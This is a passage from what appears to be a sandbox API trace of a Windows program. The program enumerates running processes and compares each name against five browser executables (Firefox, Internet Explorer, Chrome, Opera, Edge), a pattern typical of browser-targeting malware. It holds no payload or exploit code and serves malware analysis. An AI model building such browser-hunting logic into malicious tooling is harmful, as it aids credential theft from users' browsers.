th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.501] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0246.501] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0246.501] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0246.501] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0246.501] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.501] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.501] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0246.501] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0246.501] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0246.501] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0246.501] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.501] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.502] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0246.502] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0246.502] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0246.502] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0246.502] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.502] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.502] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0246.502] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0246.502] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0246.502] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0246.502] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.502] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.503] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0246.503] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0246.503] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0246.503] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0246.503] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.503] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.503] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0246.504] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0246.504] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0246.504] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0246.504] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.505] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.505] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.506] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.507] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.508] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0246.508] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0246.508] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0246.508] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0246.508] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.508] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.508] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.508] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.508] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.508] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.508] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.508] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.509] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.509] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.509] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.509] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.509] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.509] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.510] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0246.510] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0246.510] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0246.510] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0246.510] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.510] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.510] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0246.510] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0246.510] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0246.510] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0246.510] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.510] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0246.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0246.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0246.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0246.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0246.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0246.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0246.511] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0246.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0246.512] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0246.512] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0246.512] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0246.512] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0246.512] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0246.512] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0246.512] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0246.512] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0246.512] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0246.513] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.513] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0246.513] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0246.513] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0246.513] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0246.513] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0246.513] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.513] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0246.514] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0246.514] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0246.514] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0246.514] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0246.514] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0246.514] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0246.514] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0246.514] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0246.514] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0246.514] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0246.515] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0246.515] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0246.515] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0246.515] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0246.515] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0246.515] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0246.515] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0246.515] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0246.515] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0246.515] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0246.516] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0246.516] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0246.516] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0246.516] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0246.516] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.516] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0246.516] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0246.517] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0246.517] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0246.517] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0246.517] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0246.517] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0246.517] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0246.517] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0246.517] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0246.517] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0246.518] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0246.518] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0246.518] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0246.518] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0246.518] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0246.518] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0246.518] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0246.518] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0246.518] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0246.518] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0246.519] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0246.519] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0246.519] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0246.519] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0246.519] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.519] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0246.519] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0246.519] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0246.519] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0246.519] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0246.519] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0246.520] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0246.520] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0246.520] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0246.520] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0246.520] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0246.521] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0246.521] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0246.521] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0246.521] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0246.521] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0246.521] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0246.521] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0246.521] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0246.521] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0246.521] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0246.521] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0246.521] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0246.522] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0246.522] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0246.522] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0246.522] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0246.522] lstrcmpiA 